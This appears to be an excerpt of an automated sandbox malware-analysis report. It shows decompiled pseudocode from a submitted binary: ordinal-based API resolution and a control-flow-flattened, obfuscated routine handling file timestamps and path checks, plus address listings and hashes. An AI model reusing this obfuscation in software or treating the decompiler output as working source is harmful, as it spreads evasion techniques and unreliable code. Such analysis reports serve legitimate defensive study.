					 *(_t396 + 0xc8) = _t265;
					_t266 = GetProcAddress(_t389, 0x2d);
					_t358 =  *(_t396 + 4);
					 *(_t396 + 0xcc) = _t266;
					_t268 = GetProcAddress(_t358, 0x2e);
					 *(_t396 + 0xd0) = _t268;
					_t270 = GetProcAddress( *(_t396 + 4), 0x2f);
					_t324 = (_t276 & 0xffffff00 | _t193 != 0x00000000) & 0x00000001 & (_t328 & 0xffffff00 | _t195 != 0x00000000) & (_t196 & 0xffffff00 | _t196 != 0x00000000) & (_t361 & 0xffffff00 | _t198 != 0x00000000) & (_t330 & 0xffffff00 | _t200 != 0x00000000) & (_t201 & 0xffffff00 | _t201 != 0x00000000) & (_t363 & 0xffffff00 | _t203 != 0x00000000) & (_t332 & 0xffffff00 | _t205 != 0x00000000) & (_t206 & 0xffffff00 | _t206 != 0x00000000) & (_t365 & 0xffffff00 | _t208 != 0x00000000) & (_t334 & 0xffffff00 | _t210 != 0x00000000) & (_t211 & 0xffffff00 | _t211 != 0x00000000) & (_t367 & 0xffffff00 | _t213 != 0x00000000) & (_t336 & 0xffffff00 | _t215 != 0x00000000) & (_t216 & 0xffffff00 | _t216 != 0x00000000) & (_t369 & 0xffffff00 | _t218 != 0x00000000) & (_t338 & 0xffffff00 | _t220 != 0x00000000) & (_t221 & 0xffffff00 | _t221 != 0x00000000) & (_t371 & 0xffffff00 | _t223 != 0x00000000) & (_t340 & 0xffffff00 | _t225 != 0x00000000) & (_t226 & 0xffffff00 | _t226 != 0x00000000) & (_t373 & 0xffffff00 | _t228 != 0x00000000) & (_t342 & 0xffffff00 | _t230 != 0x00000000) & (_t231 & 0xffffff00 | _t231 != 0x00000000) & (_t375 & 0xffffff00 | _t233 != 0x00000000) & (_t344 & 0xffffff00 | _t235 != 0x00000000) & (_t236 & 0xffffff00 | _t236 != 0x00000000) & (_t377 & 0xffffff00 | _t238 != 0x00000000) & (_t346 & 0xffffff00 | _t240 != 0x00000000) & (_t241 & 0xffffff00 | _t241 != 0x00000000) & (_t379 & 0xffffff00 | _t243 != 0x00000000) & (_t348 & 0xffffff00 | _t245 != 0x00000000) & (_t246 & 0xffffff00 | _t246 != 0x00000000) & (_t381 & 0xffffff00 | _t248 != 0x00000000) & (_t350 & 0xffffff00 | _t250 != 0x00000000) & (_t251 & 0xffffff00 | _t251 != 0x00000000) & (_t383 & 0xffffff00 | _t253 != 0x00000000) & (_t352 & 0xffffff00 | _t255 != 0x00000000) & (_t256 & 0xffffff00 | _t256 != 0x00000000) & (_t385 & 0xffffff00 | _t258 != 0x00000000) & (_t354 & 0xffffff00 | _t260 != 0x00000000) & (_t261 & 0xffffff00 | _t261 != 0x00000000) & (_t387 & 0xffffff00 | _t263 != 0x00000000) & (_t356 & 0xffffff00 | _t265 != 0x00000000) & (_t266 & 0xffffff00 | _t266 != 0x00000000) & (_t389 & 0xffffff00 | _t268 != 0x00000000) & (_t358 & 0xffffff00 | _t270 != 0x00000000);
					 *(_t396 + 0xd4) = _t270;
					if(_t324 == 0) {
						L6:
						return _t324;
					} else {
						_t272 =  *(_t396 + 0x1c);
						if(_t272 != 0) {
							_t324 =  *_t272(_t396 + 0x14,  *((intOrPtr*)(_t396 + 0xc)),  *((intOrPtr*)(_t396 + 0x10)));
							goto L6;
						} else {
							return 0;
						}
					}
				} else {
					return 0;
				}
			}






















































































                                                                                                                              0x0040ebd0
                                                                                                                              0x0040ebd1
                                                                                                                              0x0040ebd3
                                                                                                                              0x0040ebd8
                                                                                                                              0x0040ebde
                                                                                                                              0x0040ebe9
                                                                                                                              0x0040ebed
                                                                                                                              0x0040ebfc
                                                                                                                              0x0040ebfe
                                                                                                                              0x0040ec09
                                                                                                                              0x0040ec0e
                                                                                                                              0x0040ec10
                                                                                                                              0x0040ec15
                                                                                                                              0x0040ec20
                                                                                                                              0x0040ec24
                                                                                                                              0x0040ec32
                                                                                                                              0x0040ec34
                                                                                                                              0x0040ec3f
                                                                                                                              0x0040ec44
                                                                                                                              0x0040ec46
                                                                                                                              0x0040ec4b
                                                                                                                              0x0040ec56
                                                                                                                              0x0040ec5a
                                                                                                                              0x0040ec68
                                                                                                                              0x0040ec6a
                                                                                                                              0x0040ec75
                                                                                                                              0x0040ec7a
                                                                                                                              0x0040ec7c
                                                                                                                              0x0040ec81
                                                                                                                              0x0040ec8c
                                                                                                                              0x0040ec90
                                                                                                                              0x0040ec9e
                                                                                                                              0x0040eca0
                                                                                                                              0x0040ecab
                                                                                                                              0x0040ecb0
                                                                                                                              0x0040ecb2
                                                                                                                              0x0040ecb7
                                                                                                                              0x0040ecc2
                                                                                                                              0x0040ecc6
                                                                                                                              0x0040ecd4
                                                                                                                              0x0040ecd6
                                                                                                                              0x0040ece1
                                                                                                                              0x0040ece6
                                                                                                                              0x0040ece8
                                                                                                                              0x0040eced
                                                                                                                              0x0040ecf8
                                                                                                                              0x0040ecfc
                                                                                                                              0x0040ed0a
                                                                                                                              0x0040ed0c
                                                                                                                              0x0040ed17
                                                                                                                              0x0040ed1c
                                                                                                                              0x0040ed1e
                                                                                                                              0x0040ed23
                                                                                                                              0x0040ed2e
                                                                                                                              0x0040ed32
                                                                                                                              0x0040ed40
                                                                                                                              0x0040ed47
                                                                                                                              0x0040ed4c
                                                                                                                              0x0040ed52
                                                                                                                              0x0040ed54
                                                                                                                              0x0040ed59
                                                                                                                              0x0040ed64
                                                                                                                              0x0040ed68
                                                                                                                              0x0040ed76
                                                                                                                              0x0040ed78
                                                                                                                              0x0040ed83
                                                                                                                              0x0040ed88
                                                                                                                              0x0040ed8a
                                                                                                                              0x0040ed8f
                                                                                                                              0x0040ed9a
                                                                                                                              0x0040ed9e
                                                                                                                              0x0040edac
                                                                                                                              0x0040edae
                                                                                                                              0x0040edb9
                                                                                                                              0x0040edc1
                                                                                                                              0x0040edc3
                                                                                                                              0x0040edc8
                                                                                                                              0x0040edd6
                                                                                                                              0x0040edda
                                                                                                                              0x0040edeb
                                                                                                                              0x0040eded
                                                                                                                              0x0040edf8
                                                                                                                              0x0040ee00
                                                                                                                              0x0040ee04
                                                                                                                              0x0040ee11
                                                                                                                              0x0040ee15
                                                                                                                              0x0040ee19
                                                                                                                              0x0040ee2a
                                                                                                                              0x0040ee2c
                                                                                                                              0x0040ee37
                                                                                                                              0x0040ee3f
                                                                                                                              0x0040ee41
                                                                                                                              0x0040ee46
                                                                                                                              0x0040ee54
                                                                                                                              0x0040ee58
                                                                                                                              0x0040ee69
                                                                                                                              0x0040ee6b
                                                                                                                              0x0040ee76
                                                                                                                              0x0040ee7e
                                                                                                                              0x0040ee80
                                                                                                                              0x0040ee85
                                                                                                                              0x0040ee93
                                                                                                                              0x0040ee97
                                                                                                                              0x0040eea8
                                                                                                                              0x0040eeaa
                                                                                                                              0x0040eeb5
                                                                                                                              0x0040eebd
                                                                                                                              0x0040eebf
                                                                                                                              0x0040eec4
                                                                                                                              0x0040eed2
                                                                                                                              0x0040eed9
                                                                                                                              0x0040eee7
                                                                                                                              0x0040eee9
                                                                                                                              0x0040eef4
                                                                                                                              0x0040eefc
                                                                                                                              0x0040eefe
                                                                                                                              0x0040ef03
                                                                                                                              0x0040ef11
                                                                                                                              0x0040ef15
                                                                                                                              0x0040ef26
                                                                                                                              0x0040ef28
                                                                                                                              0x0040ef33
                                                                                                                              0x0040ef3b
                                                                                                                              0x0040ef3d
                                                                                                                              0x0040ef42
                                                                                                                              0x0040ef50
                                                                                                                              0x0040ef54
                                                                                                                              0x0040ef65
                                                                                                                              0x0040ef6c
                                                                                                                              0x0040ef6e
                                                                                                                              0x0040ef74
                                                                                                                              0x0040ef98
                                                                                                                              0x0040ef9d
                                                                                                                              0x0040ef76
                                                                                                                              0x0040ef76
                                                                                                                              0x0040ef7b
                                                                                                                              0x0040ef96
                                                                                                                              0x00000000
                                                                                                                              0x0040ef7d
                                                                                                                              0x0040ef84
                                                                                                                              0x0040ef84
                                                                                                                              0x0040ef7b
                                                                                                                              0x0040ebda
                                                                                                                              0x0040ebdd
                                                                                                                              0x0040ebdd

                                                                                                                              APIs
                                                                                                                              • GetProcAddress.KERNEL32(?,00000001), ref: 0040EBE9
                                                                                                                              • GetProcAddress.KERNEL32(?,00000002), ref: 0040EBFC
                                                                                                                              • GetProcAddress.KERNEL32(?,00000012), ref: 0040EC0E
                                                                                                                              • GetProcAddress.KERNEL32(?,00000013), ref: 0040EC20
                                                                                                                              • GetProcAddress.KERNEL32(?,00000014), ref: 0040EC32
                                                                                                                              • GetProcAddress.KERNEL32(?,00000015), ref: 0040EC44
                                                                                                                              • GetProcAddress.KERNEL32(?,00000003), ref: 0040EC56
                                                                                                                              • GetProcAddress.KERNEL32(?,00000004), ref: 0040EC68
                                                                                                                              • GetProcAddress.KERNEL32(?,00000005), ref: 0040EC7A
                                                                                                                              • GetProcAddress.KERNEL32(?,00000006), ref: 0040EC8C
                                                                                                                              • GetProcAddress.KERNEL32(?,00000007), ref: 0040EC9E
                                                                                                                              • GetProcAddress.KERNEL32(?,00000008), ref: 0040ECB0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 190572456-0
                                                                                                                              • Opcode ID: da788189a7bf8461c40e7290be87f3e509e1dc55d39a560a6221b50b83d82199
                                                                                                                              • Instruction ID: 1fce6ee043fad8dfc97ff9b466ad7bff0997be9d0bdba3e4fdbe1b77fffdd4d4
                                                                                                                              • Opcode Fuzzy Hash: da788189a7bf8461c40e7290be87f3e509e1dc55d39a560a6221b50b83d82199
                                                                                                                              • Instruction Fuzzy Hash: 2BC152B6791705AFE320DB798C42F97B3ECEF84F00F05891DA569C3640E6B8E9549B10
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0042615B Relevance: 66.4, APIs: 44, Instructions: 431COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___getlocaleinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1937885557-0
                                                                                                                              • Opcode ID: 51fe72d8a695b7cbcc17e1c145f53c27b50bfcdcac0e0d7312cd61c4c0ba32ac
                                                                                                                              • Instruction ID: f386a4e9527a2a9b92f6bcb709d641746907d71107c567c3663c7ef7c5dde836
                                                                                                                              • Opcode Fuzzy Hash: 51fe72d8a695b7cbcc17e1c145f53c27b50bfcdcac0e0d7312cd61c4c0ba32ac
                                                                                                                              • Instruction Fuzzy Hash: D1E104B2A4021DBEEF11DAE1CD45EFF77BDEB04348F00051ABB15D2050EAB9AB159760
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0096B050 Relevance: 29.3, APIs: 3, Strings: 13, Instructions: 1339COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E0096B050(signed char __ecx, intOrPtr _a4, intOrPtr* _a8) {
				void* _v16;
				signed int _v24;
				char _v284;
				char _v804;
				char _v805;
				char _v806;
				char _v807;
				struct _FILETIME _v816;
				struct _SYSTEMTIME _v832;
				signed int _v836;
				signed int _v840;
				signed int _v844;
				signed char _v845;
				signed int _v846;
				signed int _v847;
				signed int _v848;
				signed int _v852;
				signed short* _v856;
				signed int _v860;
				char _v861;
				char _v862;
				signed int _v868;
				char* _v872;
				intOrPtr _v876;
				short* _v880;
				short* _v884;
				short* _v888;
				struct _FILETIME* _v892;
				short* _v896;
				signed int _v900;
				unsigned int _v904;
				signed int _v908;
				signed int _v912;
				intOrPtr _v916;
				signed int _v920;
				signed int _v924;
				signed int _v928;
				signed int _v932;
				short* _v936;
				char _v937;
				signed int _v944;
				short* _v948;
				signed int _v952;
				intOrPtr _v956;
				char* _v960;
				char* _v964;
				unsigned int* _v968;
				intOrPtr _v972;
				char _v973;
				intOrPtr _v980;
				intOrPtr* _v984;
				int* _v988;
				intOrPtr _v992;
				intOrPtr* _v996;
				unsigned int _v1024;
				intOrPtr _v1048;
				intOrPtr _v1052;
				unsigned int _v1060;
				unsigned int _v1076;
				signed int _v1080;
				char _v1084;
				char _v1088;
				intOrPtr _v1092;
				long _v1096;
				char _v1104;
				short* _v1108;
				short* _v1112;
				signed char _v1116;
				short* _v1120;
				short* _v1124;
				short* _v1128;
				intOrPtr _v1132;
				intOrPtr* _v1136;
				int* _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				void* _v1176;
				signed int _v1180;
				int _v1184;
				int _v1188;
				signed char _v1192;
				int _v1196;
				int _v1200;
				signed short* _v1204;
				intOrPtr _v1208;
				short* _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t459;
				intOrPtr* _t463;
				int _t466;
				short* _t467;
				signed int _t476;
				signed int _t484;
				signed int _t496;
				intOrPtr _t501;
				signed int _t502;
				short* _t503;
				signed int _t512;
				char* _t527;
				signed int* _t531;
				signed int _t533;
				short* _t535;
				signed int _t538;
				signed int _t556;
				signed int _t557;
				signed char _t567;
				signed int _t576;
				signed int _t587;
				signed int _t589;
				signed int _t610;
				signed int _t616;
				signed int _t619;
				signed int _t621;
				signed int _t626;
				unsigned int _t631;
				struct _FILETIME* _t638;
				signed int _t660;
				signed int _t672;
				short* _t695;
				signed int _t700;
				signed int _t725;
				signed int _t729;
				signed int _t730;
				void* _t743;
				signed int _t745;
				signed int _t753;
				signed int _t763;
				short* _t795;
				short* _t806;
				intOrPtr _t821;
				signed int _t828;
				signed char _t829;
				intOrPtr _t871;
				intOrPtr _t873;
				unsigned int _t882;
				intOrPtr* _t905;
				intOrPtr _t913;
				signed int _t933;
				signed int _t935;
				signed int _t961;
				signed int _t963;
				int* _t1037;
				signed int _t1038;
				signed int _t1039;
				void* _t1041;

				_t1041 = (_t1039 & 0xfffffff8) - 0x4b0;
				_t459 =  *0x984000; // 0xd51acdcc
				_v24 = _t459 ^ _t1038;
				_v1116 = __ecx;
				_t949 =  ==  ? 0x6e008d42 : 0x6cbf0e9e;
				_v1112 =  ==  ? 0x6e008d42 : 0x6cbf0e9e;
				_t951 =  <  ? 0x86cb41a2 : 0xa705b111;
				_t463 = _a8;
				_v1108 =  <  ? 0x86cb41a2 : 0xa705b111;
				_v1144 = __ecx + 8;
				_v1128 = _t463 + 0x220;
				_t1037 = _t463 + 0x20c;
				_v1120 = _t463 + 0x210;
				_v1124 = _t463 + 0x218;
				_v1132 = _t463 + 4;
				_v1136 = __ecx + 0x238;
				_t466 = __ecx + 4;
				_v1192 = __ecx;
				_v1140 = _t466;
				_v1180 = _t466;
				_v1176 = _t466;
				_v1184 = _t466;
				_v1188 = _t466;
				_t467 = 0xb1bc2973;
				asm("o16 nop [cs:eax+eax]");
				while(1) {
					_t806 = _t467;
					if(_t467 <= 0xf6783a3e) {
						goto L10;
					}
					L2:
					if(_t806 > 0x3486bad7) {
						__eflags = _t806 - 0x5961a97e;
						if(_t806 <= 0x5961a97e) {
							__eflags = _t806 - 0x3fff0b53;
							if(_t806 > 0x3fff0b53) {
								__eflags = _t806 - 0x410ae213;
								if(_t806 <= 0x410ae213) {
									__eflags = _t806 - 0x3fff0b54;
									if(_t806 == 0x3fff0b54) {
										_t619 =  *0x984a84; // 0x0
										_t871 =  *0x984a88; // 0x0
										_t1031 = 0xe922c03d;
										_t422 = _t619 - 1; // -1
										_t963 = _t422 * _t619;
										_t621 = _t963 ^ 0xfffffffe;
										_t621 & _t963 = _t871 - 0xa;
										_t763 =  !=  ? 0xe922c03d : 0x3fc10f67;
										__eflags = _t621 & _t963;
										_t623 =  ==  ? 0xe922c03d : 0x3fc10f67;
										__eflags = _t871 - 0xa;
										_t467 =  >=  ? 0x3fc10f67 :  ==  ? 0xe922c03d : 0x3fc10f67;
										_t961 =  &(_v856[2]);
										_v932 = _t961;
										while(1) {
											_t806 = _t467;
											if(_t467 <= 0xf6783a3e) {
												goto L10;
											}
											goto L2;
										}
									}
									__eflags = _t806 - 0x40973e0d;
									_t467 = _t806;
									if(_t806 != 0x40973e0d) {
										while(1) {
											_t806 = _t467;
											if(_t467 <= 0xf6783a3e) {
												goto L10;
											}
											goto L2;
										}
										goto L10;
									}
									_t763 = 0xcaa0b367;
									_t1031 = 0x962075be;
									_v916 = _v920 + 8;
									_t626 =  *0x984a84; // 0x0
									_t152 = _t626 - 1; // -1
									_t828 = _t152 * _t626;
									__eflags = (_t828 ^ 0xfffffffe) & _t828;
									_t503 = 0x962075be;
									L162:
									_t829 = _t828 & 0xffffff00 | __eflags == 0x00000000;
									_t504 =  ==  ? _t763 : _t503;
									__eflags =  *0x984a88 - 0xa;
									_t505 =  >=  ? _t1031 :  ==  ? _t763 : _t503;
									_t961 = (_t961 & 0xffffff00 |  *0x984a88 - 0x0000000a < 0x00000000) ^ _t829;
									_t467 =  !=  ? _t763 :  >=  ? _t1031 :  ==  ? _t763 : _t503;
									continue;
								} else {
									__eflags = _t806 - 0x410ae214;
									if(_t806 == 0x410ae214) {
										_t873 = _a8;
										_t1031 =  &_v1096;
										 *((intOrPtr*)(_t873 + 0x228)) = _v1052;
										 *((intOrPtr*)(_t873 + 0x22c)) = _v1048;
										_v896 = _t1031;
										_t631 = _v1060;
										_v832.wYear = (_t631 >> 0x19) + 0x7bc;
										_v832.wMonth = (_t631 >> 0x00000015 ^ 0x000007f0) & _t631 >> 0x00000015;
										_t882 = _t631 & 0x0000ffff;
										_v832.wDay = (_t631 >> 0x00000010 ^ 0x0000ffe0) & _t631 >> 0x00000010;
										_v832.wHour = _t882 >> 0xb;
										_t961 = (_t882 >> 0x00000005 ^ 0x000007c0) & _t882 >> 0x00000005;
										_v832.wMinute = _t961;
										_v832.wSecond = _t631 + _t631 & 0x0000003e;
										_v832.wMilliseconds = 0;
										SystemTimeToFileTime( &_v832,  &_v816);
										_v1096 = _v816.dwLowDateTime;
										_t638 =  &_v1104;
										_v1092 = _v816.dwHighDateTime;
										_v892 = _t638;
										LocalFileTimeToFileTime(_t1031, _t638);
										_v888 = _v1120;
										asm("movsd xmm0, [ecx]");
										asm("movsd [eax], xmm0");
										_v884 = _v1124;
										asm("movsd xmm0, [ecx]");
										asm("movsd [eax], xmm0");
										_v880 = _v1128;
										_v1172 = 0;
										asm("movsd xmm0, [ecx]");
										asm("movsd [eax], xmm0");
										_t467 = 0x33c42401;
									} else {
										_t467 = _v1112;
										__eflags = _t806 - 0x42d10f86;
										if(_t806 != 0x42d10f86) {
											__eflags = _t806 - 0x50380b0c;
											_t467 = _t806;
											if(_t806 == 0x50380b0c) {
												__eflags = _v944;
												_t467 =  ==  ? 0xf6783a3f : 0xaf9c5321;
											}
										}
									}
									while(1) {
										_t806 = _t467;
										if(_t467 <= 0xf6783a3e) {
											goto L10;
										}
										goto L2;
									}
								}
							} else {
								__eflags = _t806 - 0x3bb8b288;
								if(_t806 <= 0x3bb8b288) {
									__eflags = _t806 - 0x3486bad8;
									if(_t806 == 0x3486bad8) {
										__eflags = _v973;
										_t467 =  !=  ? 0x173e7aa5 : 0x2fcaea3a;
									} else {
										__eflags = _t806 - 0x39dba169;
										_t467 = _t806;
										if(_t806 == 0x39dba169) {
											_v1164 = _v860 + 4;
											_t1031 = _v880;
											_t763 = 0xd53e8000;
											_t660 =  !( !((( *(_v944 + _v860 + 2) & 0x000000ff) << 0x00000010 & 0x00210000 |  !(( *(_v944 + _v860 + 2) & 0x000000ff) << 0x10) & 0xabded316) ^ ((( *(_v860 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v860) & 0x000000ff) & 0x00002ce9 |  !(( *(_v860 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v860) & 0x000000ff) & 0xabded316)) |  !(( *(_v860 + _v944 + 3) & 0x000000ff) << 0x18)) | (( *(_v860 + _v944 + 3) & 0x000000ff) << 0x00000018 & 0xc4000000 |  !(( *(_v860 + _v944 + 3) & 0x000000ff) << 0x18) & 0x3b8bb6e2) ^ (((( *(_v944 + _v860 + 2) & 0x000000ff) << 0x00000010 & 0x00210000 |  !(( *(_v944 + _v860 + 2) & 0x000000ff) << 0x10) & 0xabded316) ^ ((( *(_v860 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v860) & 0x000000ff) & 0x00002ce9 |  !(( *(_v860 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v860) & 0x000000ff) & 0xabded316)) & 0x8074491d |  !((( *(_v944 + _v860 + 2) & 0x000000ff) << 0x00000010 & 0x00210000 |  !(( *(_v944 + _v860 + 2) & 0x000000ff) << 0x10) & 0xabded316) ^ ((( *(_v860 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v860) & 0x000000ff) & 0x00002ce9 |  !(( *(_v860 + _v944 + 1) & 0x000000ff) << 0x00000008 |  *(_v944 + _v860) & 0x000000ff) & 0xabded316)) & 0x3b8bb6e2);
											_t961 = _t660 * 0x989680 >> 0x20;
											 *_t1031 = 0xd53e8000 + _t660 * 0x989680;
											asm("adc edx, eax");
											_t467 = 0xf499ee08;
											_t1031[2] = 0x989680;
										}
									}
								} else {
									__eflags = _t806 - 0x3bb8b289;
									if(_t806 == 0x3bb8b289) {
										_v1148 = 6;
										_v1152 = _v868 + _v844 + 4;
										_t467 = 0x278da6a5;
									} else {
										__eflags = _t806 - 0x3c2044d5;
										if(_t806 == 0x3c2044d5) {
											_t467 = 0x1fa8d466;
										} else {
											__eflags = _t806 - 0x3fc10f67;
											_t467 = _t806;
											if(_t806 == 0x3fc10f67) {
												_t467 = 0x3fff0b54;
											}
										}
									}
								}
								while(1) {
									_t806 = _t467;
									if(_t467 <= 0xf6783a3e) {
										goto L10;
									}
									goto L2;
								}
							}
						}
						__eflags = _t806 - 0x7309d9f6;
						if(_t806 <= 0x7309d9f6) {
							__eflags = _t806 - 0x6cbf0e9d;
							if(_t806 <= 0x6cbf0e9d) {
								__eflags = _t806 - 0x5961a97f;
								if(_t806 == 0x5961a97f) {
									_t616 = _v924;
									L195:
									_v1208 = 5;
									_v1204 = _t616 + 8;
									_t467 = 0x72d4a841;
									continue;
								}
								__eflags = _t806 - 0x5a52d619;
								_t467 = _t806;
								if(_t806 == 0x5a52d619) {
									_t961 = _v900;
									 *_t961 =  *_v900 & 0x00000004 | ( *_v900 & 0xaa9914a4 |  !( *_v900) & 0x5566eb5b) ^ 0x5566eb5f;
									_t467 = 0x410ae214;
								}
								continue;
							}
							__eflags = _t806 - 0x6cbf0e9e;
							if(_t806 == 0x6cbf0e9e) {
								_t672 =  *0x984a84; // 0x0
								_t821 =  *0x984a88; // 0x0
								_t1031 = 0xc47c479e;
								_t230 = _t672 - 1; // -1
								_t961 = _t230 * _t672;
								_t589 = _t961 ^ 0xfffffffe;
								_t589 & _t961 = _t821 - 0xa;
								_t795 = 0xb1b46edd;
								L189:
								_t763 =  !=  ? _t1031 : _t795;
								__eflags = _t589 & _t961;
								L190:
								_t489 =  ==  ? _t1031 : _t763;
								__eflags = _t821 - 0xa;
								_t467 =  >=  ? _t763 :  ==  ? _t1031 : _t763;
								continue;
							}
							__eflags = _t806 - 0x6e008d42;
							if(_t806 == 0x6e008d42) {
								_t905 = _a8;
								 *_t905 =  *((intOrPtr*)( *_v996 + 4));
								 *((short*)(_t905 + 4)) = 0;
								_t1037[1] = 0;
								 *_t1037 = 0;
								_t1037[3] = 0;
								_t1037[2] = 0;
								_t1037[5] = 0;
								_t1037[4] = 0;
								_t1037[7] = 0;
								_t1037[6] = 0;
								_t1037[8] = 0;
								L170:
								_t467 = 0x24d6a968;
								_v1200 = 0;
							} else {
								__eflags = _t806 - 0x72d4a841;
								_t467 = _t806;
								if(_t806 == 0x72d4a841) {
									__eflags = _v1208 - 5;
									_v852 = _v1204;
									_t961 = _v852;
									_t467 =  ==  ? 0xea1b7af2 : 0xef4e2b3b;
									_v1212 = _t961;
								}
							}
						} else {
							__eflags = _t806 - 0x7a24508c;
							if(_t806 > 0x7a24508c) {
								__eflags = _t806 - 0x7a24508d;
								if(_t806 == 0x7a24508d) {
									_v1176 = (_v904 ^ 0x000000fe) & _v904;
									_v1184 = _v904 >> 0x00000001 & 0x00000001;
									_v1188 = _v904 >> 0x00000002 & 0x00000001;
									_v1180 = _v904 >> 0x00000004 & 0x00000001;
									_v1192 = _v904 >> 0x00000005 & 0x00000001;
									_t467 = 0xbc8a7546;
								} else {
									__eflags = _t806 - 0x7e21f752;
									if(_t806 == 0x7e21f752) {
										 *_a8 =  *((intOrPtr*)( *_v996 + 0x10));
										_t695 =  &_v804;
										_v936 = _t695;
										_t1031 = _t695;
										MultiByteToWideChar(0xfde9, 0, _v960, 0xffffffff, _t1031, 0x104);
										_t467 = 0xea1b7af2;
										_v1212 = _t1031;
									} else {
										__eflags = _t806 - 0x7fd59e22;
										_t467 = _t806;
										if(_t806 == 0x7fd59e22) {
											_t467 = 0xf25a0c1a;
											_v1196 = 0x700;
										}
									}
								}
							} else {
								__eflags = _t806 - 0x7309d9f7;
								if(_t806 == 0x7309d9f7) {
									__eflags = _v928 - 0x2f;
									_t467 =  ==  ? 0xe6c95ff8 : 0xda43e1af;
								} else {
									__eflags = _t806 - 0x7439d606;
									if(_t806 == 0x7439d606) {
										_t700 = E009717BA(_t806, _v856, L"\\../");
										_t1041 = _t1041 + 8;
										_v920 = _t700;
										__eflags = _v920;
										_t467 =  ==  ? 0xbcca51de : 0xd1f1bf49;
									} else {
										__eflags = _t806 - 0x76c4b56c;
										_t467 = _t806;
										if(_t806 == 0x76c4b56c) {
											_t913 = _a4;
											 *_v988 = 0xffffffff;
											_v984 = _v1136;
											__eflags =  *_v984 - _t913;
											_t706 =  ==  ? 0x84f2ab4a : 0x42d10f86;
											__eflags = _t913 - 0xffffffff;
											_t961 = 0x42d10f86;
											_t467 =  ==  ? 0x42d10f86 :  ==  ? 0x84f2ab4a : 0x42d10f86;
										}
									}
								}
							}
						}
						continue;
					}
					if(_t806 <= 0x24d6a967) {
						__eflags = _t806 - 0x148f8949;
						if(_t806 > 0x148f8949) {
							__eflags = _t806 - 0x173e7aa4;
							if(_t806 <= 0x173e7aa4) {
								__eflags = _t806 - 0x148f894a;
								if(_t806 == 0x148f894a) {
									__eflags = _v937;
									_t467 =  !=  ? 0xe0a0c47a : 0x83b108af;
								} else {
									__eflags = _t806 - 0x1561f066;
									_t467 = _t806;
									if(_t806 == 0x1561f066) {
										_t961 = _v900;
										 *_t961 =  *_v900 & 0x00000001 | ( *_v900 & 0xd984cd69 |  !( *_v900) & 0x267b3296) ^ 0x267b3297;
										_t467 = 0x8cdd1b94;
									}
								}
								continue;
							}
							__eflags = _t806 - 0x173e7aa5;
							if(_t806 == 0x173e7aa5) {
								E00965370(_v980);
								_t1041 = _t1041 + 4;
								_t467 = 0x2fcaea3a;
								continue;
							}
							__eflags = _t806 - 0x194b54ec;
							if(_t806 == 0x194b54ec) {
								_v1168 = _v840 + 4;
								_t1031 = _v888;
								_t763 = 0xd53e8000;
